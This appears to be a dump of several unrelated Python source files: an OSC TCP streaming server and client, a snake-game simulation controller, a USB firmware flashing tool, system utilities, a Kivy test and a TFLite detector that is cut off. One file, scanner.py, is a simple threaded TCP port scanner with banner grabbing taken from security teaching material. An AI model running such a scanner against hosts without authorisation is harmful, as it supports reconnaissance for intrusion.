if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
try:
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmit(len_big_endian) and self._transmit(binary):
return True
return False
except socket.error as e:
if e[0] == errno.EPIPE: # broken pipe
return False
raise e
def _receive(self, count):
""" Receive a certain amount of data from the socket and return it. If the
remote end should be closed in the meanwhile None is returned.
"""
chunk = self.connection.recv(count)
if not chunk or len(chunk) == 0:
return None
while len(chunk) < count:
tmp = self.connection.recv(count - len(chunk))
if not tmp or len(tmp) == 0:
return None
chunk = chunk + tmp
return chunk
def _receiveMsg(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receive(4)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receive(slen)
if chunk == None:
print("SERVER: Socket has been closed.")
return None
# decode OSC data and dispatch
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("SERVER: Message decoding failed.")
return msg
def handle(self):
"""
Handle a connection.
"""
# set socket blocking to avoid "resource currently not available"
# exceptions, because the connection socket inherits the settings
# from the listening socket and this times out from time to time
# in order to provide a way to shut the server down. But we want
# clean and blocking behaviour here
self.connection.settimeout(None)
print("SERVER: Entered server loop")
try:
while True:
decoded = self._receiveMsg()
if decoded == None:
return
elif len(decoded) <= 0:
# if message decoding fails we try to stay in sync but print a message
print("OSC stream server: Spurious message received.")
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
# no replies, continue receiving
continue
self._txMutex.acquire()
txOk = self._transmitMsg(msg)
self._txMutex.release()
if not txOk:
break
except socket.error as e:
if e[0] == errno.ECONNRESET:
# if connection has been reset by client, we do not care much
# about it, we just assume our duty fullfilled
print("SERVER: Connection has been reset by peer.")
else:
raise e
def sendOSC(self, oscData):
""" This member can be used to transmit OSC messages or OSC bundles
over the client/server connection. It is thread save.
"""
self._txMutex.acquire()
result = self._transmitMsg(oscData)
self._txMutex.release()
return result
""" TODO Note on threaded unbundling for streaming (connection oriented)
transport:
Threaded unbundling as implemented in ThreadingOSCServer must be implemented in
a different way for the streaming variant, because contrary to the datagram
version the streaming handler is instantiated only once per connection. This
leads to the problem (if threaded unbundling is implemented as in OSCServer)
that all further message reception is blocked until all (previously received)
pending messages are processed.
Each StreamRequestHandler should provide a so called processing queue in which
all pending messages or subbundles are inserted to be processed in the future).
When a subbundle or message gets queued, a mechanism must be provided that
those messages get invoked when time asks for them. There are the following
opportunities:
- a timer is started which checks at regular intervals for messages in the
queue (polling - requires CPU resources)
- a dedicated timer is started for each message (requires timer resources)
"""
class OSCStreamingServer(TCPServer):
""" A connection oriented (TCP/IP) OSC server.
"""
# define a socket timeout, so the serve_forever loop can actually exit.
# with 2.6 and server.shutdown this wouldn't be necessary
socket_timeout = 1
# this is the class which handles a new connection. Override this for a
# useful customized server. See the testbench for an example
RequestHandlerClass = OSCStreamRequestHandler
def __init__(self, address):
"""Instantiate an OSCStreamingServer.
- server_address ((host, port) tuple): the local host & UDP-port
the server listens for new connections.
"""
self._clientList = []
self._clientListMutex = threading.Lock()
TCPServer.__init__(self, address, self.RequestHandlerClass)
self.socket.settimeout(self.socket_timeout)
def serve_forever(self):
"""Handle one request at a time until server is closed.
Had to add this since 2.5 does not support server.shutdown()
"""
self.running = True
while self.running:
self.handle_request() # this times-out when no data arrives.
def start(self):
""" Start the server thread. """
self._server_thread = threading.Thread(target=self.serve_forever)
self._server_thread.setDaemon(True)
self._server_thread.start()
def stop(self):
""" Stop the server thread and close the socket. """
self.running = False
self._server_thread.join()
self.server_close()
# 2.6 only
#self.shutdown()
def _clientRegister(self, client):
""" Gets called by each request/connection handler when connection is
established to add itself to the client list
"""
self._clientListMutex.acquire()
self._clientList.append(client)
self._clientListMutex.release()
def _clientUnregister(self, client):
""" Gets called by each request/connection handler when connection is
lost to remove itself from the client list
"""
self._clientListMutex.acquire()
self._clientList.remove(client)
self._clientListMutex.release()
def broadcastToClients(self, oscData):
""" Send OSC message or bundle to all connected clients. """
result = True
for client in self._clientList:
result = result and client.sendOSC(oscData)
return result
class OSCStreamingServerThreading(ThreadingMixIn, OSCStreamingServer):
pass
""" Implements a server which spawns a separate thread for each incoming
connection. Care must be taken since the OSC address space is for all
the same.
"""
class OSCStreamingClient(OSCAddressSpace):
""" OSC streaming client.
A streaming client establishes a connection to a streaming server but must
be able to handle replies by the server as well. To accomplish this the
receiving takes place in a secondary thread, because no one knows if we
have to expect a reply or not, i.e. synchronous architecture doesn't make
much sense.
Replies will be matched against the local address space. If message
handlers access code of the main thread (where the client messages are sent
to the server) care must be taken e.g. by installing sychronization
mechanisms or by using an event dispatcher which can handle events
originating from other threads.
"""
# set outgoing socket buffer size
sndbuf_size = 4096 * 8
rcvbuf_size = 4096 * 8
def __init__(self):
self._txMutex = threading.Lock()
OSCAddressSpace.__init__(self)
self.socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_SNDBUF, self.sndbuf_size)
self.socket.setsockopt(socket.SOL_SOCKET, socket.SO_RCVBUF, self.rcvbuf_size)
self.socket.settimeout(1.0)
self._running = False
def _receiveWithTimeout(self, count):
chunk = str()
while len(chunk) < count:
try:
tmp = self.socket.recv(count - len(chunk))
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return None
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return None
else:
raise e
if not tmp or len(tmp) == 0:
print("CLIENT: Socket has been closed.")
return None
chunk = chunk + tmp
return chunk
def _receiveMsgWithTimeout(self):
""" Receive OSC message from a socket and decode.
If an error occurs, None is returned, else the message.
"""
# get OSC packet size from stream which is prepended each transmission
chunk = self._receiveWithTimeout(4)
if not chunk:
return None
# extract message length from big endian unsigned long (32 bit)
slen = struct.unpack(">L", chunk)[0]
# receive the actual message
chunk = self._receiveWithTimeout(slen)
if not chunk:
return None
# decode OSC content
msg = decodeOSC(chunk)
if msg == None:
raise OSCError("CLIENT: Message decoding failed.")
return msg
def _receiving_thread_entry(self):
print("CLIENT: Entered receiving thread.")
self._running = True
while self._running:
decoded = self._receiveMsgWithTimeout()
if not decoded:
break
elif len(decoded) <= 0:
continue
self.replies = []
self._unbundle(decoded)
if len(self.replies) > 1:
msg = OSCBundle()
for reply in self.replies:
msg.append(reply)
elif len(self.replies) == 1:
msg = self.replies[0]
else:
continue
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
if not txOk:
break
print("CLIENT: Receiving thread terminated.")
def _unbundle(self, decoded):
if decoded[0] != "#bundle":
self.replies += self.dispatchMessage(decoded[0], decoded[1][1:], decoded[2:], self.socket.getpeername())
return
now = time.time()
timetag = decoded[1]
if (timetag > 0.) and (timetag > now):
time.sleep(timetag - now)
for msg in decoded[2:]:
self._unbundle(msg)
def connect(self, address):
self.socket.connect(address)
self.receiving_thread = threading.Thread(target=self._receiving_thread_entry)
self.receiving_thread.start()
def close(self):
# let socket time out
self._running = False
self.receiving_thread.join()
self.socket.close()
def _transmitWithTimeout(self, data):
sent = 0
while sent < len(data):
try:
tmp = self.socket.send(data[sent:])
except socket.timeout:
if not self._running:
print("CLIENT: Socket timed out and termination requested.")
return False
else:
continue
except socket.error as e:
if e[0] == errno.ECONNRESET:
print("CLIENT: Connection reset by peer.")
return False
else:
raise e
if tmp == 0:
return False
sent += tmp
return True
def _transmitMsgWithTimeout(self, msg):
if not isinstance(msg, OSCMessage):
raise TypeError("'msg' argument is not an OSCMessage or OSCBundle object")
binary = msg.getBinary()
length = len(binary)
# prepend length of packet before the actual message (big endian)
len_big_endian = array.array('c', '\0' * 4)
struct.pack_into(">L", len_big_endian, 0, length)
len_big_endian = len_big_endian.tostring()
if self._transmitWithTimeout(len_big_endian) and self._transmitWithTimeout(binary):
return True
else:
return False
def sendOSC(self, msg):
"""Send an OSC message or bundle to the server. Returns True on success.
"""
self._txMutex.acquire()
txOk = self._transmitMsgWithTimeout(msg)
self._txMutex.release()
return txOk
def __str__(self):
"""Returns a string containing this Client's Class-name, software-version
and the remote-address it is connected to (if any)
"""
out = self.__class__.__name__
out += " v%s.%s-%s" % version
addr = self.socket.getpeername()
if addr:
out += " connected to osc://%s" % getUrlStr(addr)
else:
out += " (unconnected)"
return out
def __eq__(self, other):
"""Compare function.
"""
if not isinstance(other, self.__class__):
return False
isequal = cmp(self.socket._sock, other.socket._sock)
if isequal and self.server and other.server:
return cmp(self.server, other.server)
return isequal
def __ne__(self, other):
"""Compare function.
"""
return not self.__eq__(other)
|
singlesimcontroller.py
|
from threading import Thread, Lock
from time import sleep
from domain.evaluation import Evaluation
from view.singlesimview import SingleSimView
class SingleSimController:
"""Controller class for controlling the simulation of a single game for a single snake."""
def __init__(self, snake, uithread):
self.uithread = uithread
self.snake = snake
self.evaluation = Evaluation(snake)
self.singlesimview = SingleSimView()
self.singlesimview.add_listener(self)
self.uithread.run_on_ui_thread(lambda:
self.singlesimview.show_game_board(self.evaluation.board,
self.evaluation.current_game.moves,
self.evaluation.current_game.score))
self.simulation_step_loop_lock = Lock()
self.step_loop_interval = 5
self.simulation_step_loop_active = False
self.can_update_window = True
def on_close_simulation_window(self):
self.simulation_step_loop_active = False
self.can_update_window = False
self.singlesimview.close()
def on_set_interval(self, interval_value):
self.step_loop_interval = interval_value
def on_click_start(self):
if not self.simulation_step_loop_active:
self.simulation_step_loop_active = True
simulation_step_loop_thread = Thread(target=self.simulation_step_loop)
simulation_step_loop_thread.start()
def on_click_pause(self):
self.simulation_step_loop_active = False
def on_click_step(self):
self.simulation_step()
def simulation_step_loop(self):
self.simulation_step_loop_lock.acquire()
while self.simulation_step_loop_active:
self.simulation_step()
sleep(self.step_loop_interval/1000)
self.simulation_step_loop_lock.release()
def simulation_step(self):
if self.evaluation.current_game.finished:
self.simulation_step_loop_active = False
else:
self.evaluation.current_game.step() # Step the current game
if self.can_update_window:
self.uithread.run_on_ui_thread(lambda:
self.singlesimview.show_game_board(self.evaluation.board,
self.evaluation.current_game.moves,
self.evaluation.current_game.score))
|
kifwu.py
|
'''Kirale firmware update functions'''
from __future__ import print_function
import itertools
import os
import platform
import struct
import sys
import time
from threading import Thread, RLock
import colorama
from tqdm import tqdm
import usb.backend.libusb1 as libusb1
import usb.core
import usb.util
from kitools import kicmds, kidfu, kiserial
BACKEND = None
KIRALE_VID = 0x2DEF
MAX_PARALLEL_DEVICES = 18
if sys.version_info > (3, 0):
import queue as queue_
else:
import Queue as queue_
def resource_path(relative_path):
""" Get absolute path to resource, works for dev and for PyInstaller """
base_path = getattr(sys, '_MEIPASS', os.path.dirname(os.path.abspath(__file__)))
return os.path.join(os.path.abspath(base_path), relative_path)
def try_input(txt=None):
'''Normal input but catching the keyboard interruption'''
sys.stdout.write(
'%s%s%s%s%s '
% (
colorama.Style.BRIGHT,
colorama.Back.BLUE,
colorama.Fore.WHITE,
txt,
colorama.Style.RESET_ALL,
)
)
try:
if sys.version_info > (3, 0):
typed = input().strip()
else:
typed = raw_input().strip() # pylint: disable=E0602
except (KeyboardInterrupt, EOFError):
sys.exit('Program finished by the user.')
return typed
def colorize(msg, color):
'''Return the message colorized'''
return '%s%s%s' % (color, msg, colorama.Fore.RESET)
def sys_exit(msg):
'''Exit with a red message'''
sys.exit(colorize(msg, colorama.Fore.RED))
def backend_init():
# Initialize backend
global BACKEND
BACKEND = libusb1.get_backend()
if not BACKEND:
# Set the libusb path
if platform.system() in 'Windows':
if '32bit' in str(platform.architecture()):
LIBUSB_PATH = resource_path('libusb\\MS32\\libusb-1.0.dll')
else:
LIBUSB_PATH = resource_path('libusb\\MS64\\libusb-1.0.dll')
BACKEND = libusb1.get_backend(find_library=lambda x: LIBUSB_PATH)
if not BACKEND:
sys_exit('No USB library found.')
def get_usb_devices():
'''Return a list of connected Kirale USB devices'''
return usb.core.find(idVendor=KIRALE_VID, find_all=True, backend=BACKEND)
def get_dfu_devices(size, is_boot=False, timeout=15, required=True):
'''Return a list of connected Kirale DFU devices'''
devs = []
for _ in itertools.repeat(None, timeout):
devs = []
for dev in get_usb_devices():
if is_boot and dev.idProduct == kidfu.KINOS_DFU_PID:
devs.append(dev)
elif not is_boot and dev.idProduct != kidfu.KINOS_DFU_PID:
devs.append(dev)
else:
usb.util.dispose_resources(dev)
if len(devs) >= size:
break
for dev in devs:
usb.util.dispose_resources(dev)
print('.', end='')
time.sleep(1)
print('')
if required:
# Initialize DFU devices
dfus = []
for dev in devs:
# Detach kernel driver
if platform.system() not in 'Windows':
for config in dev:
for i in range(config.bNumInterfaces):
try:
if dev.is_kernel_driver_active(i):
dev.detach_kernel_driver(i)
except:
pass
dfus.append(kidfu.KiDfuDevice(dev))
return dfus
def dfu_find_and_flash(dfu_file, unattended=False, snum=None):
'''Flash a DFU file'''
backend_init()
run_dfus_selected = []
boot_dfus_selected = []
dfus_selected = []
# Find run-time Kirale devices
run_dfus = get_dfu_devices(0, is_boot=False)
if run_dfus:
if not snum:
run_dfus_selected = run_dfus
else:
# Filter out
for dfu in run_dfus:
if dfu.get_string(dfu.dev.iSerialNumber) in snum:
run_dfus_selected.append(dfu)
else:
usb.util.dispose_resources(dfu.dev)
print('List of %d run-time devices:' % len(run_dfus_selected))
if not run_dfus_selected:
return
# Detach KiNOS running devices
for dfu in run_dfus_selected:
try:
print(dfu)
dfu.detach(0)
except usb.core.USBError:
pass
usb.util.dispose_resources(dfu.dev)
# Wait until all devices are detached
print('\nWaiting for the devices to detach.', end='')
boot_dfus = get_dfu_devices(len(run_dfus_selected), is_boot=True)
if boot_dfus:
if not snum:
boot_dfus_selected = boot_dfus
else:
# Filter out
for dfu in boot_dfus:
if dfu.get_string(dfu.dev.iSerialNumber) in snum:
boot_dfus_selected.append(dfu)
else:
usb.util.dispose_resources(dfu.dev)
if not boot_dfus_selected:
return
print('List of %d DFU devices:' % len(boot_dfus_selected))
for dfu in boot_dfus_selected:
print(dfu)
usb.util.dispose_resources(dfu.dev)
else:
return
if not unattended:
try_input('\nPress enter to flash all the listed devices.')
# Flash DFU mode devices
start = time.time()
results = []
dfus = get_dfu_devices(len(boot_dfus_selected), is_boot=True)
if dfus:
if not snum:
dfus_selected = dfus
else:
# Filter out
for dfu in dfus:
if dfu.get_string(dfu.dev.iSerialNumber) in snum:
dfus_selected.append(dfu)
else:
usb.util.dispose_resources(dfu.dev)
if not dfus_selected:
return
while dfus_selected:
print('Remaining %d devices. ' % len(dfus_selected), end='')
batch = dfus_selected[:MAX_PARALLEL_DEVICES]
print('Flashing a batch of %d devices...' % len(batch))
results += parallel_program(dfu_flash, batch, dfu_file)
dfus_selected = dfus_selected[MAX_PARALLEL_DEVICES:]
for dfu in batch:
usb.util.dispose_resources(dfu.dev)
else:
return
flash_summary(results, start)
# Wait until all devices are in runtime
print('\nWaiting for the devices to apply the new firmware.', end='')
dfus = get_dfu_devices(max(len(run_dfus),len(boot_dfus_selected)), is_boot=False, required=False)
def flash_summary(results, start):
print(
colorize(
'Elapsed: %s'
% time.strftime("%M m %S s", time.localtime(time.time() - start)),
colorama.Fore.YELLOW,
)
)
for result in results:
print('\t' + result)
print(
'Flashed %s of %d devices.'
% (
colorize(len([r for r in results if 'OK' in r]), colorama.Fore.GREEN),
len(results),
)
)
def dfu_flash(dfu, dfu_file, queue, pos=0):
'''Flash a list of DFU devices with the given file'''
snum = dfu.get_string(dfu.dev.iSerialNumber)
# Clear left-over errors
if dfu.get_status()[1] == kidfu.DfuState.DFU_ERROR:
dfu.clear_status()
# Flash
blocks = [dfu_file.data[i : i + 64] for i in range(0, len(dfu_file.data), 64)]
with tqdm.get_lock():
progress = tqdm(
total=len(blocks),
unit='B',
unit_scale=64,
miniters=0,
desc=colorize(snum, colorama.Fore.CYAN),
position=pos,
dynamic_ncols=True,
leave=True,
smoothing=0
)
for bnum, block in enumerate(blocks):
try:
dfu.write(bnum, block)
status = dfu.wait_while_state(kidfu.DfuState.DFU_DOWNLOAD_BUSY)
if status[1] != kidfu.DfuState.DFU_DOWNLOAD_IDLE:
queue.put('%s: Error %d' % (snum, status[1]))
return
except usb.core.USBError:
queue.put('%s: USB error' % snum)
return
with tqdm.get_lock():
progress.update(1)
with tqdm.get_lock():
progress.refresh()
progress.close()
dfu.leave()
status = dfu.get_status()
if status[1] == kidfu.DfuState.DFU_MANIFEST_SYNC:
queue.put('%s: OK' % snum)
return
queue.put('%s: Error finish' % snum)
def kbi_find_and_flash(dfu_file):
'''Flash a DFU file'''
# Count DFU devices
kidevs = kiserial.find_devices(has_uart=True)
# Flash bootloader running devices
if kidevs:
print('\nFound the following KBI devices:')
for dev in kidevs:
print(' %s' % dev)
try_input('Press Enter to flash them all.')
else:
sys_exit('No KBI devices found.')
# Program the devices
start = time.time()
results = parallel_program(kbi_flash, kidevs, dfu_file)
flash_summary(results, start)
def kbi_flash(kidev, dfu_file, queue, pos=0):
'''Flash a list of KBI devices with the given file'''
ctype = kicmds.FT_CMD
ccode = kicmds.CMD_FW_UP
crsp_val = kicmds.FT_RSP | kicmds.RC_VALUE
crsp_err = kicmds.FT_RSP | kicmds.RC_FWUERR
try:
dev = kiserial.KiSerial(kidev.port)
# Flash
blocks = [dfu_file.data[i : i + 64] for i in range(0, len(dfu_file.data), 64)]
with tqdm.get_lock():
progress = tqdm(
total=len(blocks),
unit='B',
unit_scale=64,
miniters=0,
desc=colorize(kidev.snum, colorama.Fore.CYAN),
position=pos,
dynamic_ncols=True,
leave=True,
smoothing=0
)
for bnum, block in enumerate(blocks):
# Payload is the block number plus the data
payload = struct.pack('>H', bnum) + block
# Keep sending the same block until the response matches
retries = 5
while retries:
kbi_req = kicmds.KBICommand(None, ctype, ccode, payload)
kbi_rsp, _ = dev.kbi_cmd(kbi_req)
if kbi_rsp.is_valid():
rtype = kbi_rsp.get_type()
rcode = kbi_rsp.get_code()
rpload = kbi_rsp.get_payload()
# Protocol error, finish
if rtype == crsp_err:
queue.put('%s: FWU error' % kidev.snum)
return
elif rtype == crsp_val and len(rpload) >= 2:
# Received block number
recv_bnum = struct.unpack('>H', rpload[:2])[0]
# Block sent successfully
if rcode == ccode and recv_bnum == bnum:
break
# Give some time to resend the block
time.sleep(5)
retries -= 1
if not retries:
queue.put(
'%s: Could not send block #%u after 5 retries.' % (kidev.snum, bnum)
)
return
with tqdm.get_lock():
progress.update(1)
# All went good, reset the device
with tqdm.get_lock():
progress.refresh()
progress.close()
dev.ksh_cmd('reset')
queue.put('%s: OK' % kidev.snum)
except:
queue.put('%s: Serial error' % kidev.snum)
def parallel_program(flash_func, devices, dfu_file):
'''Parallel programming'''
queue = queue_.Queue()
threads = []
results = []
tqdm.monitor_interval = 0
tqdm.set_lock(RLock())
for pos, dev in enumerate(devices):
threads.append(Thread(target=flash_func, args=[dev, dfu_file, queue, pos]))
for thread in threads:
thread.start()
for thread in threads:
thread.join()
results.append(queue.get())
print('\n' * len(devices))
return results
|
scanner.py
|
#!/usr/bin/env python3.6
import argparse
import socket
import threading
screen_lock = threading.Semaphore(value=1)
def conn_scan(target_host, target_port):
try:
conn_socket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
conn_socket.connect((target_host, target_port))
conn_socket.send("Violent Python\r\n")
results = conn_socket.recv(100)
screen_lock.acquire()
print(f"[+] {target_port}/tcp open")
print(f"[+] ")
print(str(results))
conn_socket.close()
except:
print(f"[-] {target_port}/tcp closed")
finally:
screen_lock.release()
conn_socket.close()
def port_scan(target_host, target_ports):
try:
target_ip = socket.gethostbyname(target_host)
except:
print(f"[-] Cannot resolve '{target_host}'")
return
try:
target_name = socket.gethostbyaddr(target_ip)
print(f"\n[+] Scan results for: {target_name[0]}")
except:
print(f"\n[+] Scan results for: {target_ip[0]}")
socket.setdefaulttimeout(1)
for target_port in target_ports:
t = threading.Thread(target=conn_scan, args=(target_host, int(target_port)))
t.start()
def main():
parser = argparse.ArgumentParser(description="simple network scanner using TCP")
parser.add_argument("-H", dest="target_host", type=str, help="specify target host")
parser.add_argument("-P", dest="target_port", type=str, help="specify target port")
args = parser.parse_args()
target_host = args.target_host
target_ports = str(args.target_port).split(",")
port_scan(target_host, target_ports)
if (target_host is None or target_ports[0] is None):
print(parser.usage)
exit(0)
if __name__ == '__main__':
main()
|
utils.py
|
"""
Distributed under the terms of the BSD 3-Clause License.
The full license is in the file LICENSE, distributed with this software.
Author: Jun Zhu <jun.zhu@xfel.eu>
Copyright (C) European X-Ray Free-Electron Laser Facility GmbH.
All rights reserved.
"""
import os
import psutil
import socket
import multiprocessing as mp
import functools
import subprocess
from threading import RLock, Thread
import time
from .logger import logger
# profiler will only print out information if the execution of the given
# function takes more than the threshold value.
PROFILER_THREASHOLD = 1.0 # in ms
def profiler(info, *, process_time=False):
def wrap(f):
@functools.wraps(f)
def timed_f(*args, **kwargs):
if process_time:
timer = time.process_time
else:
timer = time.perf_counter
t0 = timer()
result = f(*args, **kwargs)
dt_ms = 1000 * (timer() - t0)
if dt_ms > PROFILER_THREASHOLD:
logger.debug(f"Process time spent on {info}: {dt_ms:.3f} ms")
return result
return timed_f
return wrap
class BlockTimer:
"""A context manager for measuring the execution time of a code block
For example::
>>> with BlockTimer("foo"):
... time.sleep(1)
...
Execution of foo: 1.001s
"""
def __init__(self, label="block", enabled=True):
"""Create the timer object
:param str label: A name to identify the block being timed.
:param bool enabled: Whether or not to enable this timer.
"""
self._label = label
self._enabled = enabled
def __enter__(self):
self.start = time.perf_counter()
return self
def __exit__(self, *_):
duration = time.perf_counter() - self.start
if self._enabled:
logger.info(f"Execution of {self._label}: {duration:.4f}s")
_NOT_FOUND = object()
class cached_property:
"""cached_property since Python3.8"""
def __init__(self, func):
self.func = func
self.attrname = None
self.__doc__ = func.__doc__
self.lock = RLock()
def __set_name__(self, owner, name):
if self.attrname is None:
self.attrname = name
elif name != self.attrname:
raise TypeError(
f"Cannot assign the same cached_property to two different "
f"names ({self.attrname!r} and {name!r})."
)
def __get__(self, instance, owner):
if instance is None:
return self
if self.attrname is None:
raise TypeError(
"Cannot use cached_property instance without calling "
"__set_name__ on it.")
try:
cache = instance.__dict__
except AttributeError:
# not all objects have __dict__ (e.g. class defines slots)
msg = (
f"No '__dict__' attribute on {type(instance).__name__!r} "
f"instance to cache {self.attrname!r} property."
)
raise TypeError(msg) from None
val = cache.get(self.attrname, _NOT_FOUND)
if val is _NOT_FOUND:
with self.lock:
# check if another thread filled cache while we awaited lock
val = cache.get(self.attrname, _NOT_FOUND)
if val is _NOT_FOUND:
val = self.func(instance)
try:
cache[self.attrname] = val
except TypeError:
msg = (
f"The '__dict__' attribute on "
f"{type(instance).__name__!r} instance does not "
f"support item assignment for caching "
f"{self.attrname!r} property."
)
raise TypeError(msg) from None
return val
def _get_system_cpu_info():
"""Get the system cpu information."""
class CpuInfo:
def __init__(self, n_cpus=None):
self.n_cpus = n_cpus
def __repr__(self):
return f"[CPU] count: {self.n_cpus}"
return CpuInfo(mp.cpu_count())
def _get_system_memory_info():
"""Get the system memory information."""
class MemoryInfo:
def __init__(self, total_memory=None, used_memory=None):
self.total_memory = total_memory
self.used_memory = used_memory
def __repr__(self):
return f"[Memory] " \
f"total: {self.total_memory / 1024**3:.1f} GB, " \
f"used: {self.used_memory / 1024**3:.1f} GB"
mem = psutil.virtual_memory()
return MemoryInfo(mem.total, mem.used)
def _get_system_gpu_info():
"""Get the system GPU information."""
class GpuInfo:
def __init__(self,
gpu_name=None,
total_memory=None,
used_memory=None):
self.name = gpu_name
self.total_memory = total_memory
self.used_memory = used_memory
def __repr__(self):
if self.name is None:
return f"[GPU] Not found"
return f"[GPU] " \
f"name: {self.name}, " \
f"total: {self.total_memory / 1024**3:.1f} GB, " \
f"used: {self.used_memory / 1024**3:.1f} GB"
command = ["nvidia-smi",
"--query-gpu=name,memory.total,memory.used",
"--format=csv,noheader,nounits"]
try:
p = psutil.Popen(command, stdout=subprocess.PIPE)
stdout, _ = p.communicate()
output = stdout.decode('UTF-8')
info = []
for line in output.split(os.linesep):
if line:
splitted = line.split(',')
if len(splitted) != 3:
logger.error(
f"Received unexpected query result for GPU: {line}")
info.append(GpuInfo())
else:
name = splitted[0]
total = int(splitted[1]) * 1024**2 # MB -> byte
used = int(splitted[2]) * 1024**2 # MB -> byte
info.append(GpuInfo(name, total, used))
if len(info) == 1:
return info[0]
return info
except FileNotFoundError as e:
# raised when 'nvidia-smi' does not exist
logger.debug(repr(e))
return GpuInfo()
except Exception as e:
# We don't want to prevent the app from starting simply because
# failing to get the GPU information.
logger.info(
f"Unexpected error when querying GPU information: {repr(e)}")
return GpuInfo()
def check_system_resource():
"""Check the resource of the current system"""
cpu_info = _get_system_cpu_info()
gpu_info = _get_system_gpu_info()
memory_info = _get_system_memory_info()
return cpu_info, gpu_info, memory_info
class _MetaSingleton(type):
"""Meta class and bookkeeper for Singletons."""
_instances = dict()
def __call__(cls, *args, **kwargs):
if cls not in cls._instances:
cls._instances[cls] = super().__call__(*args, **kwargs)
return cls._instances[cls]
def query_yes_no(question):
"""Ask a yes/no question and return the answer.
:param str question: the question string.
:return bool: True for yes and False for no.
"""
ans = input(f"{question} (y/n)").lower()
while True:
if ans not in ['y', 'yes', 'n', 'no']:
ans = input('please enter yes (y) or no (n): ')
continue
if ans == 'y' or ans == 'yes':
return True
if ans == 'n' or ans == 'no':
return False
def run_in_thread(daemon=False):
"""Run a function/method in a thread."""
def wrap(f):
@functools.wraps(f)
def threaded_f(*args, **kwargs):
t = Thread(target=f, daemon=daemon, args=args, kwargs=kwargs)
t.start()
return t
return threaded_f
return wrap
def get_available_port(default_port):
"""Find an available port to bind to."""
port = default_port
with socket.socket() as s:
while True:
try:
s.bind(("127.0.0.1", port))
except OSError:
port += 1
else:
break
return port
|
test_main.py
|
from threading import Thread
from time import sleep
from unittest import mock
from kivy.app import App
from kivy.clock import Clock
from kivy_garden.xcamera.main import CameraApp, main
from tests.test_main import camera_release_workaround, patch_core_camera
def patch_picture_taken():
return mock.patch('kivy_garden.xcamera.main.CameraApp.picture_taken')
class TestMain:
"""
Tests the `main` module.
"""
def test_picture_taken(self):
"""
Checks the `picture_taken()` listener gets called on the running app.
"""
app_thread = Thread(target=main)
app_thread.start()
app = App.get_running_app()
filename = mock.sentinel
Clock.schedule_once(
lambda dt: app.root.ids.xcamera.dispatch(
'on_picture_taken', filename))
with patch_picture_taken() as m_picture_taken, patch_core_camera():
sleep(0.5) # FIXME: nondeterministic approach
# makes sure app thread is gracefully stopped before asserting
app.stop()
app_thread.join()
camera_release_workaround(app)
assert type(app) == CameraApp
assert m_picture_taken.mock_calls == [
mock.call(app.root.ids.xcamera, filename)]
|
tflite_run.py
|
# Copyright (c) 2019, Bosch Engineering Center Cluj and BFMC organizers
# All rights reserved.
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
# 1. Redistributions of source code must retain the above copyright notice, this
# list of conditions and the following disclaimer.
# 2. Redistributions in binary form must reproduce the above copyright notice,
# this list of conditions and the following disclaimer in the documentation
# and/or other materials provided with the distribution.
# 3. Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
# DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE
# FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
# DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,
# OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE
import os
import cv2
import numpy as np
from threading import Thread
from multiprocessing import Pipe
import importlib.util
from src.templates.workerprocess import WorkerProcess
class ObjectDetector(WorkerProcess):
# ===================================== INIT =========================================
def __init__(self, inPs, outPs):
"""A thread for capturing the keyboard events.
Parameters
----------
outPs : list(Pipe)
List of output pipes.
"""
super(ObjectDetector,self).__init__(inPs, outPs)
self.outPs = outPs
self.inPs = inPs
# ===================================== START ========================================
def run(self):
super(ObjectDetector,self).run()
# ===================================== INIT THREADS =================================
def _init_threads(self):
"""Initialize the read thread to transmite the received messages to other processes.
"""
runCar = Thread(name='ObjectDetect',target = self._object_detect, args = (self.outPs, self.inPs, ))
self.threads.append(runCar)
def _object_detect(self, outP, inP):
MODEL_NAME = "/home/pi/repos/Brain/src/utils/tflite" #args.modeldir
GRAPH_NAME = 'detect.tflite'
LABELMAP_NAME = 'labelmap.txt'
min_conf_threshold = float(0.30)
resW = 300
resH = 300
imW = 300
imH = 300
#use_TPU = args.edgetpu
# Import TensorFlow libraries
